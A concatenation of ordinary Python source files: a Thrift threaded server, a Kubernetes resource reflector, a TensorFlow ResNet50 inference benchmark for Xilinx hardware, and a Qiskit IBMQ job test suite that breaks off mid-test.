t = threading.Thread(target = self.handle, args=(client,))
t.start()
except KeyboardInterrupt:
raise
except Exception, x:
print '%s, %s, %s,' % (type(x), x, traceback.format_exc())
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
"""Server with a fixed size pool of threads which service requests."""
def __init__(self, *args):
TServer.__init__(self, *args)
self.clients = Queue.Queue()
self.threads = 10
def setNumThreads(self, num):
"""Set the number of worker threads that should be created"""
self.threads = num
def serveThread(self):
"""Loop around getting clients from the shared queue and process them."""
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
for i in range(self.threads):
try:
t = threading.Thread(target = self.serveThread)
t.start()
except Exception, x:
print '%s, %s, %s,' % (type(x), x, traceback.format_exc())
# Pump the socket for clients
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
self.clients.put(client)
except Exception, x:
print '%s, %s, %s' % (type(x), x, traceback.format_exc())
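# Illustrative sketch (not part of Thrift): serving a handler with the
# thread-pool server, using constructor form 1) from the docstring above.
# `MyService` and `MyHandler` stand for code generated/written for your own
# Thrift IDL and are assumptions here, passed in to keep the sketch self-contained.
def example_serve(MyService, MyHandler):  # pragma: no cover
    from thrift.transport import TSocket
    processor = MyService.Processor(MyHandler())
    transport = TSocket.TServerSocket(port=9090)
    server = TThreadPoolServer(processor, transport)
    server.setNumThreads(8)
    server.serve()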
|
reflector.py
|
# specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
from concurrent.futures import Future
from functools import partial
import json
import time
import threading
from traitlets.config import LoggingConfigurable
from traitlets import Any, Bool, Dict, Int, Unicode
from kubernetes import config, watch
# This is kubernetes client implementation specific, but we need to know
# whether it was a network or watch timeout.
from urllib3.exceptions import ReadTimeoutError
from .clients import shared_client
class ResourceReflector(LoggingConfigurable):
"""Base class for keeping a local up-to-date copy of a set of
kubernetes resources.
Must be subclassed once per kind of resource that needs watching, but
in general you should subclass either NamespacedResourceReflector or
MultiNamespaceResourceReflector, depending on whether you are using
per-user namespaces or not.
"""
labels = Dict(
{},
config=True,
help="""
Labels to reflect onto local cache
"""
)
fields = Dict(
{},
config=True,
help="""
Fields to restrict the reflected objects
"""
)
resources = Dict(
{},
help="""
Dictionary of resource names to the appropriate resource objects.
This can be accessed across threads safely.
"""
)
kind = Unicode(
'resource',
help="""
Human readable name for kind of object we're watching for.
Used for diagnostic messages.
"""
)
omit_namespace = Bool(
False,
config=True,
help="""
Set this to true if the reflector is to operate across
multiple namespaces. This is set by both the
MultiNamespaceResourceReflector and
NamespacedResourceReflector subclasses, so you probably do not
have to set it yourself.
""",
)
namespace = Unicode(
None,
allow_none=True,
help="""
Namespace to watch for resources in; leave at 'None' for
MultiNamespaceResourceReflectors.
""",
)
list_method_name = Unicode(
"",
help="""
Name of the function (on the API group represented by
`api_group_name`) that is to be called to list resources.
It will be passed a label selector.
If self.omit_namespace is False (and this class is a
NamespacedResourceReflector), you want something of the form
list_namespaced_<resource> - for example,
`list_namespaced_pod` will give you a PodReflector. It will take
its namespace from self.namespace (which therefore should not be
None).
If self.omit_namespace is True (and this class is a
MultiNamespaceResourceReflector), you want
list_<resource>_for_all_namespaces.
This must be set by a subclass.
"""
)
api_group_name = Unicode(
'CoreV1Api',
help="""
Name of class that represents the apigroup on which
`list_method_name` is to be found.
Defaults to CoreV1Api, which has everything in the 'core' API group.
If you want to watch Ingresses, for example, you would have to use
ExtensionsV1beta1Api.
"""
)
request_timeout = Int(
60,
config=True,
help="""
Network timeout for kubernetes watch.
Trigger watch reconnect when a given request is taking too long,
which can indicate network issues.
"""
)
timeout_seconds = Int(
10,
config=True,
help="""
Timeout for kubernetes watch.
Trigger watch reconnect when no watch event has been received.
This will cause a full reload of the currently existing resources
from the API server.
"""
)
restart_seconds = Int(
30,
config=True,
help="""
Maximum time before restarting a watch.
The watch will be restarted at least this often,
even if events are still arriving.
Avoids trusting kubernetes watch to yield all events,
which seems to not be a safe assumption.
""")
on_failure = Any(
help="""Function to be called when the reflector gives up.""")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load kubernetes config here, since this is a Singleton and
# so this __init__ will be run way before anything else gets run.
try:
config.load_incluster_config()
except config.ConfigException:
config.load_kube_config()
self.api = shared_client(self.api_group_name)
# FIXME: Protect against malicious labels?
self.label_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.labels.items()])
self.field_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.fields.items()])
self.first_load_future = Future()
self._stop_event = threading.Event()
self.start()
def __del__(self):
self.stop()
def _list_and_update(self):
"""
Update current list of resources by doing a full fetch.
Overwrites all current resource info.
"""
initial_resources = None
if self.omit_namespace:
initial_resources = getattr(self.api, self.list_method_name)(
label_selector=self.label_selector,
field_selector=self.field_selector,
_request_timeout=self.request_timeout,
_preload_content=False,
)
else:
initial_resources = getattr(self.api, self.list_method_name)(
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector,
_request_timeout=self.request_timeout,
_preload_content=False,
)
# This is an atomic operation on the dictionary!
initial_resources = json.loads(initial_resources.read())
self.resources = {
f'{p["metadata"]["namespace"]}/{ p["metadata"]["name"]}': p for p in initial_resources["items"]}
# return the resource version so we can hook up a watch
return initial_resources["metadata"]["resourceVersion"]
def _watch_and_update(self):
"""
Keeps the current list of resources up-to-date
This method is meant to run in a background thread, not on the main thread!
We first fetch the list of current resources, and store that. Then we
register to be notified of changes to those resources, and keep our
local store up-to-date based on these notifications.
We also perform exponential backoff, giving up after we hit 32s
wait time. This should protect against network connections dropping
and intermittent unavailability of the api-server. Every time we
recover from an exception we also do a full fetch, to pick up
changes that might've been missed in the time we were not doing
a watch.
Note that we're playing a bit with fire here, by updating a dictionary
in this thread while it is probably being read in another thread
without using locks! However, dictionary access itself is atomic,
and as long as we don't try to mutate them (do a 'fetch / modify /
update' cycle on them), we should be ok!
"""
selectors = []
log_name = ""
if self.label_selector:
selectors.append("label selector=%r" % self.label_selector)
if self.field_selector:
selectors.append("field selector=%r" % self.field_selector)
log_selector = ', '.join(selectors)
cur_delay = 0.1
if self.omit_namespace:
ns_str = "all namespaces"
else:
ns_str = "namespace {}".format(self.namespace)
self.log.info(
"watching for %s with %s in %s",
self.kind,
log_selector,
ns_str,
)
while True:
self.log.debug("Connecting %s watcher", self.kind)
start = time.monotonic()
w = watch.Watch()
try:
resource_version = self._list_and_update()
if not self.first_load_future.done():
# signal that we've loaded our initial data
self.first_load_future.set_result(None)
watch_args = {
"label_selector": self.label_selector,
"field_selector": self.field_selector,
"resource_version": resource_version,
}
if not self.omit_namespace:
watch_args["namespace"] = self.namespace
if self.request_timeout:
# set network receive timeout
watch_args['_request_timeout'] = self.request_timeout
if self.timeout_seconds:
# set watch timeout
watch_args['timeout_seconds'] = self.timeout_seconds
method = partial(
getattr(self.api, self.list_method_name), _preload_content=False)
# in case of timeout_seconds, the w.stream just exits (no exception thrown)
# -> we stop the watcher and start a new one
for watch_event in w.stream(
method,
**watch_args
):
# Remember that these events are k8s api related WatchEvents
# objects, not k8s Event or Pod representations, they will
# reside in the WatchEvent's object field depending on what
# kind of resource is watched.
#
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.16/#watchevent-v1-meta
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.16/#event-v1-core
cur_delay = 0.1
resource = watch_event['object']
ref_key = "{}/{}".format(resource["metadata"]["namespace"],
resource["metadata"]["name"])
if watch_event['type'] == 'DELETED':
# This is an atomic delete operation on the dictionary!
self.resources.pop(ref_key, None)
else:
# This is an atomic operation on the dictionary!
self.resources[ref_key] = resource
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
watch_duration = time.monotonic() - start
if watch_duration >= self.restart_seconds:
self.log.debug(
"Restarting %s watcher after %i seconds",
self.kind, watch_duration,
)
break
except ReadTimeoutError:
# network read time out, just continue and restart the watch
# this could be due to a network problem or just low activity
self.log.warning(
"Read timeout watching %s, reconnecting", self.kind)
continue
except Exception:
cur_delay = cur_delay * 2
if cur_delay > 30:
self.log.exception(
"Watching resources never recovered, giving up")
if self.on_failure:
self.on_failure()
return
self.log.exception(
"Error when watching resources, retrying in %ss", cur_delay)
time.sleep(cur_delay)
continue
else:
# no events on watch, reconnect
self.log.debug("%s watcher timeout", self.kind)
finally:
w.stop()
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
self.log.warning("%s watcher finished", self.kind)
def start(self):
"""
Start the reflection process!
We'll do a blocking read of all resources first, so that we don't
race with any operations that are checking the state of the pod
store - such as polls. This should be called only once at the
start of program initialization (when the singleton is being created),
and not afterwards!
"""
if hasattr(self, 'watch_thread'):
raise ValueError(
'Thread watching for resources is already running')
self._list_and_update()
self.watch_thread = threading.Thread(target=self._watch_and_update)
# If the watch_thread is the only thread left alive, exit the app
self.watch_thread.daemon = True
self.watch_thread.start()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class NamespacedResourceReflector(ResourceReflector):
"""
Watches for resources in a particular namespace. The list_methods
want both a method name and a namespace.
"""
omit_namespace = False
class MultiNamespaceResourceReflector(ResourceReflector):
"""
Watches for resources across all namespaces. The list_methods
want only a method name. Note that this requires the service account
to be significantly more powerful, since it must be bound to ClusterRoles
rather than just Roles, and therefore this is inherently more
dangerous.
"""
omit_namespace = True
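# A hedged sketch of a concrete reflector, mirroring how a pod reflector is
# typically built on top of NamespacedResourceReflector. The label below is an
# illustrative assumption; real deployments configure `labels`, `fields` and
# `namespace` through traitlets config or constructor arguments. Note that
# constructing a reflector immediately starts its watch thread (see __init__),
# so instantiation requires access to a kubernetes API server.
class ExamplePodReflector(NamespacedResourceReflector):
    """Keep a local, thread-safe cache of pods in `self.namespace`."""
    kind = Unicode('pods')
    list_method_name = Unicode('list_namespaced_pod')
    labels = Dict({'component': 'singleuser-server'})

    @property
    def pods(self):
        # `resources` maps 'namespace/name' -> pod dict; reads are plain
        # atomic dict lookups, so this is safe from other threads.
        return self.resources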
|
tf_resnet50_inference.py
|
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
import os
import time
import timeit
import threading
from tqdm import tqdm
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import importer
from tensorflow.contrib import vitis_vai
from tensorflow.python.client import timeline
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import dtypes as dtypes_module
from dataloader import DataLoader
from input_fn import calib_input
tf.app.flags.DEFINE_string('input_graph',
'', 'TensorFlow \'GraphDef\' file to load.')
tf.app.flags.DEFINE_string('eval_image_path',
'', 'The directory where put the eval images')
tf.app.flags.DEFINE_string('eval_image_list',
'/workspace/test_performance_classification.list',
'file has validation images list')
tf.app.flags.DEFINE_string(
'preprocess_type', 'inception',
'image preprocess type, choices are inception and vgg')
tf.app.flags.DEFINE_string('input_node', '', 'input node of pb model')
tf.app.flags.DEFINE_string('output_node', '', 'output node of pb model')
tf.app.flags.DEFINE_integer('input_height', 224, 'input height of pb model')
tf.app.flags.DEFINE_integer('input_width', 224, 'input width of pb model')
tf.app.flags.DEFINE_integer('label_offset', 1, 'label offset')
tf.app.flags.DEFINE_integer('eval_iter', 10000, 'eval iterations')
tf.app.flags.DEFINE_integer('eval_batch', 8, 'eval batch size')
tf.app.flags.DEFINE_integer('nthreads', 4, 'threads number')
tf.app.flags.DEFINE_string('mode', '', 'accuracy or perf mode')
FLAGS = tf.app.flags.FLAGS
def make_callable(sess, feed=[], target=[], fetch=[]):
def name_list_append(src, dist):
for element in src:
if isinstance(element, tf.Tensor):
dist.append(element.op.name)
elif isinstance(element, tf.Operation):
dist.append(element.name)
else:
raise ValueError("element must be Tensor or Operation")
callable_opts = config_pb2.CallableOptions()
name_list_append(feed, callable_opts.feed)
name_list_append(target, callable_opts.target)
name_list_append(fetch, callable_opts.fetch)
callable_object = sess._make_callable_from_options(callable_opts)
def run_callable(feed_dict):
feed_values = []
for key, value in feed_dict.items():
if not isinstance(value, tf.Tensor):
key_type = dtypes_module.as_dtype(key.dtype)
value = np.asarray(value,
dtype=key_type.as_numpy_dtype)
feed_values.append(value)
return callable_object(*feed_values)
return run_callable
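# Hedged usage sketch for make_callable: build the callable once for a fixed
# feed/fetch signature, then call it repeatedly. `sess`, the placeholder `x`,
# the tensor `y` and the numpy array `x_value` are assumed to be supplied by
# the caller; this helper is illustrative and unused by the script itself.
def _example_make_callable_usage(sess, x, y, x_value):
    run_y = make_callable(sess, feed=[x], fetch=[y])
    # Equivalent to sess.run([y], feed_dict={x: x_value}), but without
    # re-validating the feed/fetch lists on every call.
    return run_y({x: x_value})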
def _parse_input_graph_proto(input_graph, input_binary):
"""Parser input tensorflow graph into GraphDef proto."""
if not gfile.Exists(input_graph):
print("Input graph file '" + input_graph + "' does not exist!")
return -1
input_graph_def = graph_pb2.GraphDef()
mode = "rb" if input_binary else "r"
with gfile.FastGFile(input_graph, mode) as f:
if input_binary:
input_graph_def.ParseFromString(f.read())
else:
text_format.Merge(f.read(), input_graph_def)
return input_graph_def
def run_thread(cnt):
for count in range(cnt, n_of_group, FLAGS.nthreads):
# Use the session callable rather than sess.run for better performance:
'''
sess.run([top1_update, top5_update],
feed_dict={
in_image: batch_group[count],
in_label: batch_group_labels[count]
})
'''
sess_callable(feed_dict={
in_image: batch_group[count],
in_label: batch_group_labels[count]
})
def do_run():
threads = []
for i in range(FLAGS.nthreads):
t1 = threading.Thread(target=run_thread, args=(i,))
threads.append(t1)
start_t = time.perf_counter()
for x in threads:
x.start()
for x in threads:
x.join()
end_t = time.perf_counter()
return end_t - start_t
if __name__ == "__main__":
sess = tf.compat.v1.Session()
in_image = tf.compat.v1.placeholder(tf.float32,
shape=(None, FLAGS.input_height,
FLAGS.input_width, 3),
name='in_image')
in_label = tf.compat.v1.placeholder(tf.int64, shape=(None, 1), name='in_label')
input_binary = False if 'txt' in FLAGS.input_graph else True
input_graph_def = _parse_input_graph_proto(FLAGS.input_graph, input_binary)
# Create wego graph through wego's API
vai_wego_graph = vitis_vai.create_wego_graph(
target="DPUCVDX8H_ISA1_F2W2_8PE",
input_graph_def=input_graph_def)
sess.graph.as_default()
_ = importer.import_graph_def(
vai_wego_graph,
name="",
input_map={FLAGS.input_node + ':0': in_image})
logits = sess.graph.get_tensor_by_name(FLAGS.output_node + ':0')
top1, top1_update = tf.compat.v1.metrics.recall_at_k(in_label,
logits,
1,
name="precision_top1")
top5, top5_update = tf.compat.v1.metrics.recall_at_k(in_label,
logits,
5,
name="precision_top5")
var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.LOCAL_VARIABLES,
scope="precision")
vars_initializer = tf.compat.v1.variables_initializer(var_list=var_list)
sess.run(vars_initializer)
with open(FLAGS.eval_image_list, 'r') as fr:
lines = fr.readlines()
if FLAGS.eval_iter > len(lines):
raise ValueError(
"eval_iter(%d) should be fewer than total image numbers(%d)." %
(FLAGS.eval_iter, len(lines)))
eval_steps = np.int64(np.ceil(FLAGS.eval_iter / FLAGS.eval_batch))
print("[INFO] loading %d images with batch mode..."%(FLAGS.eval_iter))
batch_group, batch_group_labels = calib_input(FLAGS.preprocess_type, FLAGS.input_height, FLAGS.input_width,
FLAGS.eval_image_list, eval_steps, FLAGS.eval_batch, FLAGS.eval_iter,
FLAGS.eval_image_path, FLAGS.label_offset)
# Create callable directly for better performance
sess_callable = make_callable(sess, feed=[in_image, in_label], target=[
top1_update, top5_update])
n_of_group = len(batch_group)
mode = FLAGS.mode
if mode != "accuracy" and mode != "perf":
raise ValueError(
"Unsupported mode, support values: [ %s, %s]." %
("accuracy", "perf"))
if mode == "accuracy":
r_n = 1
print("[INFO] start accuracy test...")
do_run()
top1_val, top5_val = sess.run([top1, top5])
print("============ Test Result =============")
print('Total Images: %d' % (FLAGS.eval_iter))
print('Recall_1 = [%s]' % str(top1_val))
print('Recall_5 = [%s]' % str(top5_val))
else:
r_n = 20
print("[INFO] start perf test...")
print("[INFO] repeat running %d times with %d images...." %
(r_n, FLAGS.eval_iter))
t = 0.0
for i in tqdm(range(r_n)):
t += do_run()
print("=========== Perf Result ==============")
print("Total Images: %d" % (FLAGS.eval_iter * r_n))
print('Use_time = [%0.2fs]' % (t))
print('qps = [%0.2f]' % (float(FLAGS.eval_iter) / (t / r_n)))
sess.close()
|
test_ibmq_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMQJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock, skip
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit_ibm import least_busy
from qiskit_ibm.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit_ibm.ibmqbackend import IBMQRetiredBackend
from qiskit_ibm.exceptions import IBMQBackendError, IBMQBackendApiError
from qiskit_ibm.utils.utils import api_status_to_job_status
from qiskit_ibm.job.exceptions import IBMQJobTimeoutError
from qiskit_ibm.utils.converters import local_to_utc
from qiskit_ibm.api.rest.job import Job as RestJob
from qiskit_ibm.api.exceptions import RequestsApiError
from ..ibmqtestcase import IBMQTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
from ..fake_account_client import BaseFakeAccountClient, CancelableFakeJob
class TestIBMQJob(IBMQTestCase):
"""Test ibmqjob module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout and self.sim_backend.status().pending_jobs <= 5:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend))
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0, start_datetime=self.last_month)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1))
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2))
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(backend_1.retrieve_job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(backend_2.retrieve_job(job_2.job_id()).backend().name(),
backend_2.name())
# test retrieve requests for jobs that exist on other backends throw errors
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_1.retrieve_job, job_2.job_id())
self.assertIn('belongs to', str(context_manager.warning))
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_2.retrieve_job, job_1.job_id())
self.assertIn('belongs to', str(context_manager.warning))
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMQBackendError,
self.provider.backend.retrieve_job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.sim_backend.jobs(limit=5, skip=5, status=arg,
start_datetime=self.last_month)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
{'status': [JobStatus.ERROR, JobStatus.CANCELLED],
'db_filter': None},
{'status': [JobStatus.CANCELLED],
'db_filter': {'or': [{'status': {'regexp': '^ERROR'}}]}},
{'status': [JobStatus.ERROR],
'db_filter': {'or': [{'status': 'CANCELLED'}]}}
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.sim_backend.jobs(
status=status_filter['status'],
db_filter=status_filter['db_filter'],
start_datetime=self.last_month)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.sim_backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month)
